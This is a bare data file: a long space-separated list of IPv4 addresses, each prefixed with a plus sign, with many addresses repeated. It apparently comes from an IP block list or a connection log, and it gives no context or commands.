+125.227.177.18 +18.163.113.32 +183.149.236.6 +119.129.112.94 +117.24.78.188 +183.148.225.205 +202.121.151.200 +111.164.186.182 +120.197.148.199 +183.148.226.119 +211.75.23.169 +218.189.221.250 +58.251.74.6 +18.167.69.75 +61.178.16.100 +192.144.235.214 +42.194.178.20 +49.232.212.58 +210.45.98.115 +183.14.79.240 +47.98.40.27 +223.112.4.195 +27.152.126.132 +120.197.145.230 +117.24.79.114 +113.106.103.151 +115.210.93.181 +203.86.8.157 +60.162.23.6 +115.174.67.198 +116.128.228.13 +171.104.120.245 +116.54.81.129 +106.14.10.92 +218.255.25.106 +60.189.126.208 +119.127.17.89 +202.196.96.164 +171.212.109.154 +117.89.94.7 +219.130.221.108 +219.130.221.105 +219.130.221.83 +58.216.51.50 +118.186.244.229 +218.189.221.251 +117.81.63.183 +203.86.8.50 +218.189.221.252 +120.197.145.222 +183.63.231.39 +219.143.237.166 +117.24.139.209 +180.76.47.33 +125.89.35.52 +61.144.254.122 +183.49.47.78 +219.130.221.107 +118.113.146.205 +125.211.59.213 +59.42.90.99 +14.126.205.139 +61.145.231.195 +120.77.3.169 +112.27.91.20 +14.155.223.213 +113.0.135.73 +220.166.242.138 +183.131.137.238 +116.7.72.33 +171.104.121.30 +60.177.244.185 +114.255.169.74 +47.98.191.166 +111.229.114.104 +180.112.226.99 +221.225.61.94 +117.85.142.32 +113.96.111.174 +117.85.142.32 +123.117.115.55 +47.98.40.27 +183.149.237.32 +114.222.246.6 +113.96.111.131 +59.75.105.7 +180.112.170.158 +219.143.237.166 +180.112.170.158 +61.166.162.127 +1.14.240.73 +121.199.55.180 +113.116.126.36 +116.229.198.141 +218.15.34.114 +61.161.221.9 +47.111.148.48 +115.218.124.231 +81.70.245.142 +125.120.253.209 +120.209.105.228 +112.254.88.94 +120.77.22.3 +116.7.74.144 +110.42.163.27 +116.236.254.82 +59.61.122.112 +120.77.4.125 +103.36.90.58 +103.234.81.61 +180.112.168.250 +117.12.155.21 +218.11.132.36 +113.116.127.199 +1.117.43.127 +82.156.210.72 +101.34.162.174 +150.109.42.19 +152.136.127.155 +60.162.23.109 +116.30.196.21 +60.190.198.7 +117.24.139.42 +113.105.201.1 +123.118.93.239 +115.174.67.238 +113.116.124.26 +59.67.167.251 +183.138.178.221 +110.87.24.198 +113.116.125.16 +59.75.105.7 +59.75.105.7 +222.187.11.174 +112.2.13.246 +42.247.35.55 +117.15.64.162 +59.46.170.94 +219.143.237.166 +103.36.90.58 +115.225.22.240 +59.75.105.7 +61.141.203.226 +120.27.194.36 +220.135.89.194 +101.231.158.226 +14.126.204.203 +183.27.182.243 +211.21.128.43 +113.116.45.198 +113.105.202.53 +116.7.72.143 +114.88.152.175 +203.70.237.41 +39.108.173.147 +182.61.131.80 +182.245.143.109 +113.110.202.78 +47.95.245.160 +117.30.222.216 +116.7.74.110 +116.7.75.41 +113.118.75.151 +210.71.232.180 +114.220.127.12 +183.128.146.222 +222.79.37.174 +183.149.252.212 +183.148.239.125 +202.181.238.30 +122.245.82.227 +117.30.222.216 +121.46.248.106 +60.173.37.155 +183.143.169.108 +183.134.118.245 +60.177.247.29 +182.61.131.81 +202.181.238.30 +120.192.218.38 +59.48.144.170 +125.89.33.82 +39.105.119.54 +117.24.77.171 +222.187.11.174 +14.29.188.58 +111.164.195.144 +183.27.180.237 +117.107.147.138 +183.128.147.94 +183.148.231.185 +111.85.91.5 +113.118.73.190 +125.35.4.70 +14.126.207.70 +183.17.231.250 +218.0.168.183 +211.147.247.249 +180.112.168.18 +113.119.8.63 +60.220.238.170 +115.174.67.140 +113.116.1.219 +183.149.231.254 +113.119.8.192 +61.129.182.23 +182.136.210.254 +182.245.143.53 +113.116.126.145 +117.24.77.129 +113.57.160.10 +218.73.32.143 +114.88.152.175 +115.219.75.75 +121.12.253.170 +113.105.200.176 +202.105.104.26 +218.73.61.192 +180.109.32.148 +116.196.85.185 +180.112.229.3 +202.99.122.230 +120.25.24.28 +47.97.77.93 +120.24.83.215 +14.126.206.167 +125.219.111.161 +183.136.119.189 +125.72.13.157 +183.138.133.200 +113.119.8.2 +221.8.8.241 +183.49.47.141 +183.148.227.16 +183.148.227.16 +115.174.67.177 +220.166.243.239 +111.85.91.5 +117.15.214.194 +113.118.18.20 +60.189.123.60 +180.114.144.229 +110.87.25.165 +116.196.112.147 +183.136.127.168 +36.26.227.162 +183.49.47.110 +183.235.205.203 +122.245.81.29 +118.190.217.98 +103.36.90.58 +218.7.208.207 +115.195.56.127 +183.143.11.127 +180.109.124.55 +125.36.238.6 +58.144.7.23 +120.78.174.48 +183.148.233.36 +61.49.58.179 +183.138.173.203 +123.119.0.169 +123.157.218.11 +120.27.197.181 +113.105.202.211 +47.99.187.96 +47.99.111.21 +183.49.86.219 +120.41.151.183 +112.115.17.91 +112.115.17.24 +221.223.150.169 +219.139.106.174 +54.223.16.217 +183.14.78.118 +60.176.11.61 +58.39.218.252 +123.119.4.94 +103.36.90.54 +121.28.103.210 +182.150.168.146 +183.49.45.182 +117.85.142.109 +116.54.57.90 +111.204.110.106 +117.82.137.72 +47.101.216.147 +59.75.105.7 +111.164.185.12 +58.213.155.25 +120.24.64.169 +117.12.156.36 +123.155.65.85 +59.42.60.146 +183.2.142.152 +103.36.90.58 +103.36.90.58 +116.236.78.87 +112.74.100.213 +115.208.230.42 +121.235.93.135 +183.148.239.223 +118.190.217.98 +123.117.116.6 +106.122.199.167 +119.181.179.38 +220.166.243.61 +112.26.98.168 +117.131.6.178 +59.56.32.133 +122.245.87.203 +101.70.68.22 +115.218.122.164 +113.108.103.186 +221.130.161.49 +111.164.174.125 +218.15.34.145 +182.42.109.217 +106.12.241.133 +106.12.241.132 +106.12.241.131 +211.103.34.181 +122.230.245.114 +113.105.202.155 +61.189.156.205 +120.224.18.4 +221.179.119.18 +125.89.32.104 +220.166.243.205 +117.8.64.8 +113.118.18.158 +171.223.86.99 +112.14.163.62 +125.89.34.160 +113.118.72.134 +113.81.202.112 +112.255.83.8 +180.112.28.91 +183.14.76.11 +113.88.124.31 +218.16.249.227 +49.77.43.144 +183.138.176.245 +118.31.217.73 +14.155.222.2 +124.47.10.36 +218.241.213.53 +221.179.119.18 +113.105.200.214 +123.155.64.119 +124.70.180.3 +118.113.147.220 +113.110.202.160 +211.152.55.133 +61.178.68.138 +115.219.232.92 +58.37.230.86 +220.179.92.120 +220.189.235.74 +183.158.25.90 +220.160.201.110 +60.189.105.156 +103.36.90.58 +120.25.94.32 +183.148.58.137 +113.88.121.150 +116.62.60.69 +113.103.39.126 +123.56.21.234 +111.21.38.68 +115.202.51.36 +116.7.75.252 +113.105.203.246 +58.216.51.50 +125.89.32.231 +36.26.231.243 +180.112.228.210 +120.76.215.97 +14.126.204.247 +183.15.205.77 +106.12.241.131 +183.148.238.68 +116.54.94.174 +182.245.143.180 +113.92.167.17 +211.103.34.181 +123.56.21.234 +114.245.76.237 +203.166.162.137 +211.103.34.181 +103.13.247.5 +14.215.50.132 +61.220.34.25 +1.117.180.234 +103.36.90.58 +119.144.15.37 +58.240.170.2 +115.202.51.203 +121.46.4.81 +120.224.87.72 +210.5.145.195 +121.8.145.133 +101.70.73.46 +183.27.183.148 +59.42.89.233 +101.70.73.46 +49.72.213.248 +59.75.105.7 +58.37.230.86 +116.54.81.106 +116.7.74.61 +183.49.45.67 +59.42.61.22 +113.88.141.76 +211.152.55.134 +39.75.209.80 +182.61.130.215 +120.236.240.100 +103.36.90.58 +183.17.230.68 +183.148.44.2 +61.172.215.12 +125.46.3.211 +222.243.160.70 +202.201.2.158 +202.189.1.122 +113.118.17.19 +123.56.21.234 +124.64.101.23 +43.240.92.14 +112.74.27.18 +218.241.213.53 +113.116.171.119 +183.148.232.38 +14.215.50.132 +113.119.8.17 +119.129.113.18 +60.162.19.2 +59.42.62.11 +116.7.72.96 +183.138.181.10 +218.203.162.50 +116.1.201.172 +183.167.246.147 +59.57.251.137 +119.181.235.32 +61.54.187.109 +61.54.187.107 +221.226.192.63 +114.220.93.195 +119.6.96.135 +183.17.229.146 +220.166.242.172 +58.212.30.52 +125.69.92.159 +14.155.220.75 +61.189.223.215 +222.85.25.84 +211.103.34.181 +218.24.173.4 +113.90.176.255 +220.166.241.2 +113.116.124.23 +218.28.244.22 +218.241.213.56 +112.244.38.247 +112.74.51.125 +120.25.60.43 +116.7.72.62 +112.74.65.25 +61.145.61.33 +183.14.77.229 +183.149.238.87 +122.206.91.155 +117.48.195.24 +113.116.125.197 +218.203.194.230 +202.100.92.37 +117.48.195.28 +115.174.67.57 +58.212.30.60 +60.162.162.20 +183.138.160.189 +110.64.48.131 +183.149.254.72 +171.104.120.242 +221.226.115.13 +113.105.200.213 +218.22.168.139 +218.69.104.210 +222.168.23.201 +60.25.194.214 +180.112.226.53 +120.79.0.3 +111.164.178.26 +125.75.126.153 +218.56.1.207 +60.210.111.227 +183.156.233.41 +60.164.173.189 +113.104.206.120 +118.116.41.197 +45.116.141.54 +117.30.222.115 +113.90.135.189 +59.46.134.168 +211.103.34.181 +183.148.224.35 +52.81.4.50 +113.88.106.93 +36.26.206.205 +218.63.171.5 +118.186.244.188 +183.240.86.125 +103.36.90.58 +183.27.181.174 +113.116.171.72 +113.105.201.105 +113.103.39.240 +218.85.221.12 +218.93.19.10 +183.149.230.27 +183.149.246.239 +60.188.196.150 +116.7.73.54 +47.92.142.239 +117.88.192.138 +120.25.126.95 +183.131.143.229 +103.36.90.58 +117.24.136.65 +58.213.181.154 +183.138.137.208 +183.49.47.220 +117.82.26.23 +120.193.71.201 +59.48.144.170 +183.15.207.124 +120.42.46.54 +111.164.174.38 +58.246.19.139 +120.24.236.227 +117.48.195.26 +117.48.195.27 +117.48.195.25 +59.48.144.170 +218.75.199.212 +125.46.30.42 +113.116.88.67 +101.132.148.65 +113.88.103.164 +59.75.8.197 +14.155.221.44 +180.112.231.83 +183.138.181.232 +59.56.32.169 +61.153.30.44 +45.116.141.54 +183.143.27.234 +117.28.224.67 +218.76.255.70 +120.202.251.72 +125.89.69.202 +171.104.120.121 +116.7.74.179 +60.189.108.233 +60.162.19.201 +119.166.247.30 +61.185.19.48 +101.70.66.208 +183.249.114.229 +47.114.51.60 +223.111.249.76 +120.78.227.151 +220.166.241.106 +113.102.145.144 +14.155.221.244 +222.184.54.100 +59.42.62.38 +117.82.178.97 +219.139.35.84 +61.149.244.38 +113.116.88.132 +211.142.150.211 +1.15.126.28 +112.225.224.140 +14.126.207.42 +183.156.237.89 +218.65.220.13 +113.16.135.204 +113.118.72.13 +218.17.138.227 +116.7.75.169 +220.184.121.105 +223.75.59.113 +61.157.34.100 +61.174.150.232 +113.119.8.64 +14.126.204.246 +113.90.177.165 +211.149.134.3 +36.26.224.197 +49.65.164.28 +113.116.171.83 +125.89.32.131 +183.138.153.173 +113.116.89.217 +36.26.225.159 +119.181.183.3 +117.141.240.122 +112.73.81.245 +14.155.221.208 +113.105.201.186 +113.110.203.220 +183.14.79.109 +183.136.103.162 +60.189.112.140 +115.174.67.109 +203.166.162.136 +59.44.204.190 +14.126.207.141 +211.152.55.131 +113.118.74.47 +42.123.124.195 +113.90.176.46 +118.114.96.121 +61.143.46.94 +183.149.238.212 +111.198.128.133 +218.76.35.182 +113.81.200.244 +60.162.165.6 +14.17.69.135 +183.14.79.27 +112.90.146.203 +61.142.73.72 +115.174.67.78 +60.189.116.216 +183.159.111.212 +103.36.90.58 +39.75.68.174 +59.42.88.12 +123.119.10.65 +115.174.67.24 +101.6.208.3 +180.109.37.183 +113.106.199.148 +113.77.160.154 +60.248.93.252 +124.160.68.118 +47.94.164.182 +39.98.127.79 +60.248.93.252 +182.150.110.24 +36.25.126.247 +113.113.82.72 +60.2.96.129 +113.116.171.190 +125.89.34.150 +123.150.46.220 +183.143.93.246 +183.14.76.117 +60.189.127.130 +218.28.75.29 +14.126.206.23 +116.24.66.143 +112.115.17.126 +183.49.47.136 +114.248.211.178 +118.163.232.138 +183.240.87.132 +183.167.243.237 +39.75.189.225 +218.95.46.69 +115.219.5.191 +60.173.116.136 +115.174.67.18 +58.213.123.218 +59.42.62.162 +58.212.35.114 +211.79.206.57 +119.191.6.82 +113.110.166.118 +220.191.70.249 +115.174.67.51 +122.230.252.128 +183.14.79.33 +218.10.43.41 +59.42.91.208 +183.49.46.109 +60.189.116.89 +183.15.88.96 +182.149.71.73 +58.221.232.34 +116.54.81.31 +182.150.170.66 +101.229.74.36 +61.161.132.139 +183.62.208.142 +211.79.206.59 +211.79.206.88 +218.108.113.79 +60.189.109.189 +113.89.32.71 +40.73.79.9 +116.7.73.3 +183.138.157.191 +14.17.103.104 +125.118.16.57 +60.2.200.18 +47.107.147.32 +61.141.139.150 +40.73.119.155 +211.152.55.132 +116.30.199.243 +49.66.180.95 +211.99.97.120 +113.88.141.9 +125.89.32.227 +116.7.72.36 +111.193.177.133 +113.90.177.71 +113.105.201.255 +125.72.125.200 +36.26.230.19 +113.102.147.181 +59.42.61.185 +60.162.162.130 +125.89.35.190 +203.166.162.131 +221.130.159.75 +124.227.108.237 +222.80.156.146 +113.116.125.220 +115.222.111.36 +119.129.115.214 +114.248.216.157 +183.149.244.153 +113.105.200.196 +183.148.43.220 +49.233.15.180 +116.7.72.185 +220.166.241.69 +120.211.11.90 +61.222.122.83 +106.122.199.239 +111.164.190.4 +114.55.250.251 +183.49.45.254 +115.203.198.205 +183.27.182.186 +61.129.182.44 +116.30.196.89 +119.136.114.112 +183.148.229.236 +112.90.146.204 +123.155.67.127 +171.104.121.43 +183.149.245.193 +218.206.146.131 +112.115.17.43 +124.42.239.136 +123.120.147.168 +123.56.114.126 +116.30.197.237 +119.129.130.32 +223.82.107.28 +123.155.67.127 +116.7.73.206 +115.29.64.149 +58.240.99.166 +221.226.195.236 +116.25.36.205 +119.129.119.111 +183.27.180.53 +125.126.218.229 +111.193.174.146 +103.36.90.58 +112.29.232.191 +113.116.1.119 +111.39.28.69 +115.218.122.225 +125.107.154.7 +59.42.91.53 +120.253.115.105 +115.203.99.219 +113.104.206.5 +221.131.111.190 +116.7.74.161 +119.190.116.109 +218.242.70.214 +120.209.31.25 +123.234.222.165 +123.155.65.216 +125.126.207.209 +122.243.155.246 +60.2.96.129 +118.122.225.14 +120.115.146.231 +112.226.14.88 +61.166.162.184 +101.200.145.197 +171.104.120.132 +60.191.106.165 +61.166.162.39 +211.99.97.120 +111.164.188.20 +47.107.146.207 +117.141.80.44 +116.24.67.4 +183.49.86.73 +117.81.34.173 +119.136.112.21 +183.136.108.185 +112.4.234.19 +123.110.194.36 +183.49.46.161 +183.143.90.115 +183.233.206.10 +125.120.240.205 +123.155.65.216 +121.196.181.135 +183.148.237.121 +125.89.34.124 +193.112.72.248 +113.88.250.42 +220.166.243.159 +113.88.253.128 +27.184.34.12 +18.162.232.79 +18.167.69.187 +81.68.242.187 +59.42.89.168 +49.77.43.227 +18.166.210.165 +18.162.191.93 +18.167.126.0 +18.163.214.91 +18.167.51.65 +18.163.24.191 +18.163.194.125 +18.167.134.145 +115.221.143.219 +115.219.5.90 +121.196.53.26 +218.22.41.234 +183.138.189.214 +180.169.69.238 +211.23.119.168 +119.129.118.74 +218.108.113.79 +60.178.88.146 +125.113.190.143 +125.89.32.90 +61.186.155.27 +36.26.224.235 +113.105.200.24 +115.29.245.73 +183.158.29.89 +27.195.37.163 +125.89.33.151 +218.0.168.79 +125.113.181.70 +183.148.228.234 +59.75.8.103 +117.13.46.253 +111.26.164.22 +111.26.164.22 +60.208.107.234 +59.42.90.247 +103.36.90.59 +223.220.175.66 +222.247.47.212 +116.54.57.118 +59.46.134.166 +202.206.64.232 +101.70.70.39 +111.26.164.22 +180.152.157.50 +111.26.164.22 +111.14.46.29 +111.26.164.22 +111.26.164.22 +113.116.148.117 +111.26.164.22 +219.146.7.42 +59.56.32.118 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +113.116.89.50 +111.26.164.22 +111.26.164.22 +103.36.90.54 +111.26.164.22 +121.37.152.76 +59.56.32.160 +119.129.119.158 +119.129.115.17 +113.118.75.21 +113.88.251.51 +116.7.72.165 +111.26.164.22 +111.26.164.22 +115.219.5.247 +111.26.164.22 +111.26.164.22 +112.255.74.160 +218.245.4.3 +111.26.164.22 +111.26.164.22 +183.138.151.76 +111.26.164.22 +111.26.164.22 +115.221.142.106 +111.26.164.22 +111.26.164.22 +116.7.74.160 +111.39.139.154 +111.26.164.22 +183.149.252.174 +111.26.164.22 +220.169.109.13 +183.27.182.109 +111.26.164.22 +111.26.164.22 +112.254.90.184 +111.26.164.22 +202.206.64.204 +121.17.172.121 +111.26.164.22 +61.166.162.88 +120.76.21.132 +111.26.164.22 +111.26.164.22 +111.26.164.22 +183.27.180.219 +222.217.19.251 +111.26.164.22 +111.26.164.22 +121.42.55.186 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +121.235.93.132 +115.202.45.132 +111.26.164.22 +112.115.17.246 +111.26.164.22 +14.215.109.168 +114.245.74.118 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +115.174.67.86 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +183.149.233.145 +115.221.142.113 +111.26.164.22 +183.143.5.124 +111.26.164.22 +111.26.164.22 +111.26.164.22 +45.125.10.107 +111.26.164.22 +111.26.164.22 +125.119.26.65 +111.26.164.22 +111.26.164.22 +123.234.175.187 +125.71.149.236 +111.26.164.22 +113.110.201.223 +111.26.164.22 +14.155.220.68 +111.20.104.169 +111.26.164.22 +60.191.15.194 +111.26.164.22 +111.26.164.22 +111.26.164.22 +220.184.242.35 +119.129.131.15 +47.107.95.216 +113.105.201.25 +220.184.241.65 +111.26.164.22 +122.245.85.112 +221.5.152.51 +111.26.164.22 +125.89.69.202 +222.210.185.196 +111.26.164.22 +113.110.203.35 +111.26.164.22 +111.26.164.22 +210.13.193.38 +111.26.164.22 +183.143.24.202 +124.235.195.61 +221.7.151.131 +61.157.34.242 +111.26.164.22 +111.26.164.22 +111.26.164.22 +121.18.68.218 +121.18.68.216 +121.18.68.217 +101.231.0.84 +111.26.164.22 +110.88.153.92 +110.88.153.192 +110.88.153.34 +111.26.164.22 +222.212.185.29 +111.26.164.22 +220.201.207.167 +111.26.164.22 +111.26.164.22 +123.155.65.127 +111.26.164.22 +123.155.65.127 +111.26.164.22 +222.134.46.62 +111.26.164.22 +60.26.115.103 +111.26.164.22 +111.26.164.22 +113.88.250.108 +112.255.12.90 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.21.38.68 +125.69.90.126 +111.198.128.151 +111.26.164.22 +219.238.169.252 +111.26.164.22 +221.223.137.65 +118.114.243.129 +218.253.202.75 +60.14.44.100 +58.254.177.254 +183.64.214.57 +111.26.164.22 +111.26.164.22 +171.106.48.55 +111.26.164.22 +111.26.164.22 +218.88.40.7 +101.229.77.108 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +120.27.24.49 +60.189.103.206 +47.107.95.123 +211.141.217.202 +61.189.56.226 +222.85.106.125 +111.26.164.22 +111.26.164.22 +111.26.164.22 +59.50.104.81 +171.221.204.28 +123.155.69.154 +111.26.164.22 +14.155.222.144 +101.89.165.21 +111.26.164.22 +111.26.164.22 +122.245.85.190 +111.26.164.22 +111.26.164.22 +120.27.24.49 +111.26.164.22 +111.26.164.22 +125.89.65.59 +111.26.164.22 +111.26.164.22 +115.174.67.2 +111.26.164.22 +116.25.134.152 +125.89.35.145 +111.26.164.22 +112.255.13.33 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +182.245.143.93 +218.5.98.137 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +106.122.199.3 +111.26.164.22 +59.46.68.209 +116.7.72.234 +111.21.38.77 +111.26.164.22 +60.251.253.42 +113.118.16.42 +111.26.164.22 +111.26.164.22 +183.143.29.17 +116.7.72.97 +115.174.67.11 +210.202.209.18 +111.26.164.22 +111.26.164.22 +61.166.162.2 +111.26.164.22 +61.129.71.53 +218.9.55.205 +125.122.108.143 +112.255.71.243 +61.189.223.215 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +120.209.8.188 +111.26.164.22 +115.195.58.21 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +116.128.228.13 +111.26.164.22 +222.177.25.172 +183.148.233.183 +153.0.162.1 +111.26.164.22 +115.222.110.251 +111.26.164.22 +61.184.25.178 +111.26.164.22 +111.26.164.22 +115.202.61.46 +183.203.220.123 +124.165.218.213 +202.65.215.236 +113.87.162.140 +111.26.164.22 +111.26.164.22 +111.26.164.22 +59.153.93.82 +59.153.93.72 +111.26.164.22 +124.165.218.213 +111.26.164.22 +59.75.8.103 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +59.153.93.83 +59.153.93.86 +59.153.93.69 +106.55.164.180 +117.115.103.229 +112.27.114.102 +180.109.124.147 +116.7.74.249 +112.27.156.182 +183.128.147.136 +111.26.164.22 +58.250.88.14 +58.214.238.134 +61.141.65.66 +61.177.123.170 +211.144.105.114 +115.222.111.83 +47.107.170.42 +203.95.2.50 +122.245.87.230 +183.223.139.208 +115.221.138.42 +125.122.108.118 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +219.148.89.89 +115.207.204.160 +218.0.174.179 +183.27.180.244 +111.26.164.22 +111.26.164.22 +122.227.47.162 +111.26.164.22 +101.70.66.51 +111.26.164.22 +111.26.164.22 +218.245.4.3 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +59.153.93.71 +221.7.113.46 +183.166.129.196 +123.118.88.167 +111.26.164.22 +183.158.24.35 +59.153.93.84 +111.26.164.22 +111.26.164.22 +113.88.120.105 +60.189.100.169 +183.14.76.193 +111.26.164.22 +14.215.245.162 +111.26.164.22 +117.115.103.228 +111.26.164.22 +111.26.164.22 +113.87.161.16 +111.26.164.22 +111.26.164.22 +221.123.135.37 +111.26.164.22 +111.26.164.22 +113.116.17.185 +113.73.13.189 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +211.141.195.142 +119.129.115.43 +111.26.164.22 +111.26.164.22 +121.225.172.144 +59.42.88.238 +183.27.180.12 +115.219.4.37 +111.164.172.116 +39.77.219.114 +220.168.55.213 +61.163.95.190 +111.26.164.22 +120.79.70.211 +121.201.56.166 +111.26.164.22 +125.46.40.227 +111.26.164.22 +125.107.163.185 +47.110.240.159 +111.26.164.22 +183.148.226.25 +218.24.173.4 +183.138.145.139 +111.26.164.22 +122.245.82.153 +111.39.46.57 +112.31.24.80 +222.212.185.166 +111.26.164.22 +111.26.164.22 +115.195.185.228 +59.46.68.209 +111.26.164.22 +111.26.164.22 +183.136.119.21 +123.155.64.64 +118.113.146.221 +111.26.164.22 +111.26.164.22 +125.71.149.208 +111.26.164.22 +113.116.15.216 +113.88.250.18 +125.89.33.224 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +183.15.179.146 +219.148.89.88 +49.65.112.94 +222.210.108.167 +59.67.97.213 +113.88.253.250 +111.26.164.22 +121.235.92.118 +183.156.215.246 +112.27.135.88 +60.162.163.160 +111.26.164.22 +47.98.130.107 +111.26.164.22 +111.26.164.22 +125.71.247.52 +113.116.126.177 +113.87.161.242 +113.105.203.53 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +113.103.39.92 +59.153.93.87 +113.196.137.35 +111.26.164.22 +123.150.9.78 +113.110.201.234 +111.26.164.22 +112.30.53.73 +111.26.164.22 +111.26.164.22 +115.217.143.126 +59.42.88.220 +14.155.221.230 +121.4.93.224 +111.26.164.22 +111.26.164.22 +183.49.86.229 +183.138.149.109 +211.144.105.117 +211.144.105.118 +117.50.41.86 +116.25.37.149 +113.73.14.189 +222.79.37.190 +210.76.97.217 +58.247.111.14 +220.166.242.224 +111.26.164.22 +111.26.164.22 +182.150.57.94 +183.149.242.24 +60.6.198.170 +221.178.146.145 +116.24.65.23 +183.143.28.170 +111.26.164.22 +118.112.98.11 +222.223.55.134 +183.49.45.120 +183.149.240.116 +111.26.164.22 +111.26.164.22 +122.245.85.151 +220.191.69.126 +113.116.90.96 +111.162.89.155 +47.94.175.134 +59.153.93.87 +210.243.86.27 +106.13.81.180 +120.237.175.237 +61.190.14.50 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +180.117.160.177 +154.8.226.228 +111.26.164.22 +222.187.120.92 +60.189.118.51 +114.242.79.203 +219.148.89.89 +121.225.7.33 +218.61.46.117 +58.221.62.91 +61.184.25.178 +220.178.31.152 +111.26.164.22 +111.26.164.22 +118.190.73.166 +115.219.7.216 +183.136.109.6 +222.192.128.53 +111.26.164.22 +111.26.164.22 +113.90.239.188 +159.75.215.59 +111.26.164.22 +111.26.164.22 +222.95.174.95 +111.26.164.22 +182.245.143.27 +111.26.164.22 +111.26.164.22 +115.219.6.68 +111.26.164.22 +111.26.164.22 +123.159.113.252 +119.23.29.206 +113.73.14.190 +60.12.83.7 +119.146.237.210 +218.75.130.249 +112.255.251.2 +111.26.164.22 +115.221.138.94 +183.63.85.92 +183.49.86.100 +220.191.56.158 +210.72.20.202 +111.26.164.22 +58.220.232.9 +111.26.164.22 +112.30.140.106 +180.163.179.114 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +58.213.113.39 +111.26.164.22 +112.115.17.188 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +14.215.233.234 +113.102.144.30 +183.138.157.176 +58.244.247.22 +61.166.162.229 +119.1.235.135 +111.26.164.22 +101.231.0.82 +222.223.55.134 +183.14.79.91 +222.209.81.41 +39.77.216.205 +117.27.144.100 +220.166.240.204 +111.26.164.22 +112.27.224.188 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.26.164.22 +123.234.200.7 +111.26.164.22 +202.205.161.186 +113.89.34.145 +111.26.164.22 +211.103.218.82 +111.22.3.157 +111.22.3.150 +111.26.164.22 +114.116.123.177 +111.26.164.22 +180.168.136.214 +180.168.136.220 +111.26.164.22 +222.216.6.172 +111.26.164.22 +111.26.164.22 +111.26.164.22 +111.12.120.11 +119.23.224.76 +111.26.164.22 +111.26.164.22 +59.75.8.103 +222.77.183.40 +61.143.243.59 +101.231.208.166 +113.90.179.44 +111.26.164.22 +111.26.164.22 +61.143.243.59 +111.26.164.22 +61.143.243.59 +111.26.164.22 +218.84.127.245 +61.143.243.59 +111.26.164.22 +115.195.186.78 +61.143.243.59 +61.143.243.59 +111.26.164.22 +106.52.41.23 +111.26.164.22 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +111.26.164.22 +61.143.243.59 +61.143.243.59 +59.42.89.172 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +211.103.218.82 +61.143.243.59 +111.26.164.22 +111.26.164.22 +61.143.243.59 +61.143.243.59 +61.143.243.59 +183.15.90.164 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +222.223.55.134 +61.143.243.59 +101.72.131.195 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +221.220.105.180 +111.26.164.22 +61.143.243.59 +125.107.174.127 +110.88.153.41 +61.143.243.59 +111.26.164.22 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +111.38.109.34 +61.143.243.59 +61.143.243.59 +61.143.243.59 +110.80.1.70 +120.209.123.77 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +210.41.236.202 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +125.67.125.234 +61.143.243.59 +111.26.164.22 +61.143.243.59 +61.143.243.59 +61.143.243.59 +60.189.116.1 +111.26.164.22 +61.143.243.59 +49.65.115.29 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +116.7.74.221 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +123.234.200.7 +60.162.17.124 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +120.237.94.226 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +61.143.243.59 +222.180.164.81 +61.143.243.59 +61.143.243.59 +61.143.243.59 +122.243.220.254 +61.143.243.59 +114.35.105.33 +111.26.164.22 +61.143.243.59 +122.245.158.175 +61.143.243.59 +61.143.243.59 +219.132.156.20 +61.143.243.59 +61.143.243.59 +111.26.164.22 +61.143.243.59 +61.143.243.59 +202.199.225.6 +61.143.243.59 +61.166.162.92 +61.143.243.59 